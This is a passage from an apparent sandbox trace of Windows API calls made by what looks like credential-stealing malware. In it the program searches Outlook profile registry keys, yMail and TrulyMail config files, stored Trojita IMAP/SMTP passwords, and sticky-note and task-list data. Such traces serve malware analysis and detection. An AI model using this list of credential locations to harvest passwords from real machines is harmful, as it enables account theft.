Flags=0x0, Size=0xb4) returned 0x871d98 [0185.286] GetProcessHeap () returned 0x840000 [0185.286] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.286] GetProcessHeap () returned 0x840000 [0185.286] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b38 [0185.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.287] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x871b38 | out: phkResult=0x871b38*=0x220) returned 0x0 [0185.288] GetProcessHeap () returned 0x840000 [0185.288] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.289] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.289] GetProcessHeap () returned 0x840000 [0185.290] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.291] RegCloseKey (hKey=0x220) returned 0x0 [0185.291] GetProcessHeap () returned 0x840000 [0185.291] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b38 | out: hHeap=0x840000) returned 1 [0185.291] GetProcessHeap () returned 0x840000 [0185.291] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.293] RegCloseKey (hKey=0x22c) returned 0x0 [0185.293] GetProcessHeap () returned 0x840000 [0185.293] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b18 | out: hHeap=0x840000) returned 1 [0185.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.295] SHEnumKeyExW (in: hkey=0x234, dwIndex=0xc, pszName=0x875288, pcchName=0x19f824 | out: pszName="f35c115766b7c94cb080da6869ae8f9d", pcchName=0x19f824) returned 0x0 [0185.295] GetProcessHeap () returned 0x840000 [0185.295] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b78 [0185.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.296] RegOpenKeyW (in: hKey=0x234, lpSubKey="f35c115766b7c94cb080da6869ae8f9d", phkResult=0x871b78 | out: phkResult=0x871b78*=0x22c) returned 0x0 [0185.296] GetProcessHeap () returned 0x840000 [0185.296] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.298] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.298] GetProcessHeap () returned 0x840000 [0185.298] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.298] GetProcessHeap () returned 0x840000 [0185.298] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.302] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.303] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d") returned 88 [0185.303] GetProcessHeap () returned 0x840000 [0185.303] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb4) returned 0x871d98 [0185.303] GetProcessHeap () returned 0x840000 [0185.303] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.303] GetProcessHeap () returned 0x840000 [0185.303] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871cb8 [0185.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.305] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d", phkResult=0x871cb8 | out: phkResult=0x871cb8*=0x220) returned 0x0 [0185.305] GetProcessHeap () returned 0x840000 [0185.305] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.306] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.306] GetProcessHeap () returned 0x840000 [0185.306] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.308] RegCloseKey (hKey=0x220) returned 0x0 [0185.308] GetProcessHeap () returned 0x840000 [0185.308] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871cb8 | out: hHeap=0x840000) returned 1 [0185.308] GetProcessHeap () returned 0x840000 [0185.308] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.310] RegCloseKey (hKey=0x22c) returned 0x0 [0185.310] GetProcessHeap () returned 0x840000 [0185.310] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b78 | out: hHeap=0x840000) returned 1 [0185.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.317] SHEnumKeyExW (in: hkey=0x234, dwIndex=0xd, pszName=0x875288, pcchName=0x19f824 | out: pszName="f86ed2903a4a11cfb57e524153480001", pcchName=0x19f824) returned 0x0 [0185.318] GetProcessHeap () returned 0x840000 [0185.318] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b38 [0185.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.328] RegOpenKeyW (in: hKey=0x234, lpSubKey="f86ed2903a4a11cfb57e524153480001", phkResult=0x871b38 | out: phkResult=0x871b38*=0x22c) returned 0x0 [0185.328] GetProcessHeap () returned 0x840000 [0185.328] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.330] SHQueryValueExW (in: hkey=0x22c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208 | out: pdwType=0x0, pvData=0x8756a0, pcbData=0x19f398*=0x208) returned 0x2 [0185.330] GetProcessHeap () returned 0x840000 [0185.330] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.330] GetProcessHeap () returned 0x840000 [0185.330] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.331] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.332] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f808 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001") returned 88 [0185.332] GetProcessHeap () returned 0x840000 [0185.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xb4) returned 0x871d98 [0185.332] GetProcessHeap () returned 0x840000 [0185.332] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.332] GetProcessHeap () returned 0x840000 [0185.332] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c18 [0185.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.334] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", phkResult=0x871c18 | out: phkResult=0x871c18*=0x220) returned 0x0 [0185.334] GetProcessHeap () returned 0x840000 [0185.334] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x8756a0 [0185.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.336] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x8756a0, pcchName=0x19f7f4 | out: pszName="", pcchName=0x19f7f4) returned 0x103 [0185.336] GetProcessHeap () returned 0x840000 [0185.336] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8756a0 | out: hHeap=0x840000) returned 1 [0185.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.338] RegCloseKey (hKey=0x220) returned 0x0 [0185.338] GetProcessHeap () returned 0x840000 [0185.338] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c18 | out: hHeap=0x840000) returned 1 [0185.338] GetProcessHeap () returned 0x840000 [0185.338] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.339] RegCloseKey (hKey=0x22c) returned 0x0 [0185.339] GetProcessHeap () returned 0x840000 [0185.339] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b38 | out: hHeap=0x840000) returned 1 [0185.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.340] SHEnumKeyExW (in: hkey=0x234, dwIndex=0xe, pszName=0x875288, pcchName=0x19f824 | out: pszName="", pcchName=0x19f824) returned 0x103 [0185.340] GetProcessHeap () returned 0x840000 [0185.340] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0185.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0185.342] RegCloseKey (hKey=0x234) returned 0x0 [0185.342] GetProcessHeap () returned 0x840000 [0185.342] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0185.342] GetProcessHeap () returned 0x840000 [0185.342] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.342] GetProcessHeap () returned 0x840000 [0185.342] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8721f0 | out: hHeap=0x840000) returned 1 [0185.342] GetProcessHeap () returned 0x840000 [0185.343] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0185.343] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.344] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0185.344] GetProcessHeap () returned 0x840000 [0185.344] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x87a228 [0185.345] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.346] wvsprintfW (in: param_1=0x87a228, param_2="%s\\yMail2\\POP3.xml", arglist=0x19f790 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 47 [0185.346] GetProcessHeap () returned 0x840000 [0185.346] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x62) returned 0x871d98 [0185.346] GetProcessHeap () returned 0x840000 [0185.346] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.347] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.348] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 0 [0185.348] GetProcessHeap () returned 0x840000 [0185.348] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.348] GetProcessHeap () returned 0x840000 [0185.348] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.348] GetProcessHeap () returned 0x840000 [0185.348] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0185.349] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.350] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0185.350] GetProcessHeap () returned 0x840000 [0185.350] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x87a228 [0185.351] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.351] wvsprintfW (in: param_1=0x87a228, param_2="%s\\yMail2\\SMTP.xml", arglist=0x19f784 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 47 [0185.351] GetProcessHeap () returned 0x840000 [0185.351] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x62) returned 0x871d98 [0185.351] GetProcessHeap () returned 0x840000 [0185.352] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.353] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 0 [0185.353] GetProcessHeap () returned 0x840000 [0185.353] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.353] GetProcessHeap () returned 0x840000 [0185.353] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.353] GetProcessHeap () returned 0x840000 [0185.353] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0185.354] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.354] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0185.354] GetProcessHeap () returned 0x840000 [0185.354] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6c) returned 0x87a228 [0185.355] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.356] wvsprintfW (in: param_1=0x87a228, param_2="%s\\yMail2\\Accounts.xml", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 51 [0185.356] GetProcessHeap () returned 0x840000 [0185.356] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6a) returned 0x871d98 [0185.356] GetProcessHeap () returned 0x840000 [0185.356] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.358] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 0 [0185.358] GetProcessHeap () returned 0x840000 [0185.358] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.358] GetProcessHeap () returned 0x840000 [0185.358] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.358] GetProcessHeap () returned 0x840000 [0185.358] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0185.359] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.360] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0185.360] GetProcessHeap () returned 0x840000 [0185.360] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x87a228 [0185.361] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.362] wvsprintfW (in: param_1=0x87a228, param_2="%s\\yMail\\ymail.ini", arglist=0x19f76c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 47 [0185.362] GetProcessHeap () returned 0x840000 [0185.362] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x62) returned 0x871d98 [0185.362] GetProcessHeap () returned 0x840000 [0185.362] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.363] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 0 [0185.363] GetProcessHeap () returned 0x840000 [0185.363] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.363] GetProcessHeap () returned 0x840000 [0185.363] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.363] GetProcessHeap () returned 0x840000 [0185.363] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0185.363] GetProcessHeap () returned 0x840000 [0185.363] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x872130 [0185.363] GetProcessHeap () returned 0x840000 [0185.363] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875288 [0185.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.368] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="imap.auth.pass", pdwType=0x0, pvData=0x875288, pcbData=0x19f6c4*=0x104 | out: pdwType=0x0, pvData=0x875288, pcbData=0x19f6c4*=0x104) returned 0x2 [0185.368] GetProcessHeap () returned 0x840000 [0185.368] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0185.368] GetProcessHeap () returned 0x840000 [0185.368] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x875288 [0185.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.369] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="msa.smtp.auth.pass", pdwType=0x0, pvData=0x875288, pcbData=0x19f6c4*=0x104 | out: pdwType=0x0, pvData=0x875288, pcbData=0x19f6c4*=0x104) returned 0x2 [0185.369] GetProcessHeap () returned 0x840000 [0185.369] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0185.369] GetProcessHeap () returned 0x840000 [0185.369] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.369] GetProcessHeap () returned 0x840000 [0185.369] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872130 | out: hHeap=0x840000) returned 1 [0185.369] GetProcessHeap () returned 0x840000 [0185.369] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8c) returned 0x87a228 [0185.370] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.371] wvsprintfW (in: param_1=0x87a228, param_2="%s\\TrulyMail\\Data\\Settings\\user.config", arglist=0x19f7e8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 73 [0185.371] GetProcessHeap () returned 0x840000 [0185.371] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x96) returned 0x871d98 [0185.371] GetProcessHeap () returned 0x840000 [0185.371] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.372] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 0 [0185.372] GetProcessHeap () returned 0x840000 [0185.372] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.372] GetProcessHeap () returned 0x840000 [0185.372] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x12c) returned 0x873a58 [0185.373] GetProcessHeap () returned 0x840000 [0185.373] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x872088 [0185.373] GetProcessHeap () returned 0x840000 [0185.373] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873b90 [0185.374] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.374] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x873b90 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0185.375] Sleep (dwMilliseconds=0xa) [0185.390] GetProcessHeap () returned 0x840000 [0185.391] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.391] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.393] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f5a4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn") returned 37 [0185.393] GetProcessHeap () returned 0x840000 [0185.393] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4e) returned 0x861f00 [0185.393] GetProcessHeap () returned 0x840000 [0185.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.393] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn", lpFindFileData=0x19f5b8 | out: lpFindFileData=0x19f5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x84a940, ftLastWriteTime.dwHighDateTime=0x84a940, nFileSizeHigh=0x865c50, nFileSizeLow=0x8661c8, dwReserved0=0x0, dwReserved1=0x19f614, cFileName="ը眩", cAlternateFileName="뒭蕬͈읩꿏憫\x19䂑@")) returned 0xffffffff [0185.394] GetProcessHeap () returned 0x840000 [0185.394] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861f00 | out: hHeap=0x840000) returned 1 [0185.394] GetProcessHeap () returned 0x840000 [0185.394] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873b90 | out: hHeap=0x840000) returned 1 [0185.394] GetProcessHeap () returned 0x840000 [0185.394] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873b90 [0185.395] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.396] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x873b90 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0185.397] Sleep (dwMilliseconds=0xa) [0185.435] GetProcessHeap () returned 0x840000 [0185.435] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f4a) returned 0x87a228 [0185.435] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.437] wvsprintfW (in: param_1=0x87a228, param_2="%s\\%s", arglist=0x19f58c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn") returned 35 [0185.437] GetProcessHeap () returned 0x840000 [0185.437] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4a) returned 0x861da0 [0185.437] GetProcessHeap () returned 0x840000 [0185.437] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.437] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn", lpFindFileData=0x19f5a0 | out: lpFindFileData=0x19f5a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x84a940, ftLastWriteTime.dwHighDateTime=0x84a940, nFileSizeHigh=0x865c50, nFileSizeLow=0x865d90, dwReserved0=0x0, dwReserved1=0x19f5fc, cFileName="ը眩", cAlternateFileName="⦰螚䇆꾧憫\x19䂑@")) returned 0xffffffff [0185.438] GetProcessHeap () returned 0x840000 [0185.438] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861da0 | out: hHeap=0x840000) returned 1 [0185.438] GetProcessHeap () returned 0x840000 [0185.438] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873b90 | out: hHeap=0x840000) returned 1 [0185.438] GetProcessHeap () returned 0x840000 [0185.438] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0185.438] GetProcessHeap () returned 0x840000 [0185.438] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872088 | out: hHeap=0x840000) returned 1 [0185.438] GetProcessHeap () returned 0x840000 [0185.438] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f74) returned 0x87a228 [0185.439] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.440] wvsprintfW (in: param_1=0x87a228, param_2="%s\\To-Do DeskList\\tasks.db", arglist=0x19f804 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 61 [0185.440] GetProcessHeap () returned 0x840000 [0185.440] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7e) returned 0x871d98 [0185.440] GetProcessHeap () returned 0x840000 [0185.440] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.441] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\To-Do DeskList\\tasks.db") returned 0 [0185.442] GetProcessHeap () returned 0x840000 [0185.442] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: hHeap=0x840000) returned 1 [0185.442] GetProcessHeap () returned 0x840000 [0185.442] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x12c) returned 0x873a58 [0185.442] GetProcessHeap () returned 0x840000 [0185.442] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x8721f0 [0185.442] GetProcessHeap () returned 0x840000 [0185.442] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873b90 [0185.442] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0185.444] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x873b90 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0185.444] GetProcessHeap () returned 0x840000 [0185.444] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x87a228 [0185.445] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0185.446] wvsprintfW (in: param_1=0x87a228, param_2="%s\\stickies\\images", arglist=0x19f7cc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 53 [0185.446] GetProcessHeap () returned 0x840000 [0185.446] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6e) returned 0x871d98 [0185.446] GetProcessHeap () returned 0x840000 [0185.446] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a228 | out: hHeap=0x840000) returned 1 [0185.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0185.447] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\stickies\\images") returned 0 [0185.447] GetProcessHeap () returned 0x840000 [0185.447] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873b90 | out: hHeap=0x840000) returned 1 [0185.447] GetProcessHeap () returned 0x840000 [0185.447] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d98 | out: 